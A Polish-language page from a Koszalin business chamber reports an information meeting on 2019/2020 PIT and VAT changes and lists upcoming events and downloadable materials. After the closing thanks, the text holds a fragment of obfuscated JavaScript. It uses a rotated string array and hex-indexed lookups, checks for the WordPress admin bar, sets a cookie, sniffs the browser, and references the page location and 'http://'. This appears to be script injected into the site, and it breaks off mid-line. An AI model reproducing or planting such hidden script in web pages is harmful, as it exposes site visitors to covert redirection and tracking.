Zmiany PIT i VAT 2019/2020 – relacja ze spotkania | Północna Izba Gospodarcza w Koszalinie

19 listopada 2019 r. o godzinie 13:00,  w siedzibie Urzędu Skarbowego w Koszalinie, odbyło się spotkanie informacyjne pt. „Zmiany w zakresie PIT i VAT 2019/2020”.

Na spotkaniu omówione zostały zmiany z dziedziny prawa podatkowego, które weszły w życie z dniem 1 września i 1 listopada, w zakresie podatku dochodowego PIT, podatku od towarów i usług VAT.

Dodatkowo przybliżone zostały zagadnienia ogólne związane z problematyką dostępności narzędzi ułatwiających kontakt z instytucjami publicznymi i załatwianiem spraw za pośrednictwem Internetu.

Bardzo dziękujemy za Państwa przybycie na nasze szkolenie.

Zachęcamy do uczestnictwa w kolejnych wydarzeniach organizowanych przez Północną Izbę Gospodarczą, w tym m.in.

4 grudnia (środa) Seminarium PPK dla MŚP – prowadzący Polski Fundusz Rozwojowy

5 grudnia (czwartek) Mów tak by inni Cię słuchali – warsztaty dla Przedsiębiorców

12 grudnia (czwartek) Wigilia Północnej Izby Gospodarczej – Bałtycki Teatr Dramatyczny
w Koszalinie.

Materiały po spotkaniu do pobrania:

Mikrorachunek

Kasy fiskalne

Zmiany VAT od 1 września 2019

Zmiany VAT od 1 listopada 2019

Jeszcze raz bardzo dziękujemy za przybycie ido zobaczenia na kolejnych wydarzeniach Północnej Izby Gospodarczej w Koszalinie! 'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m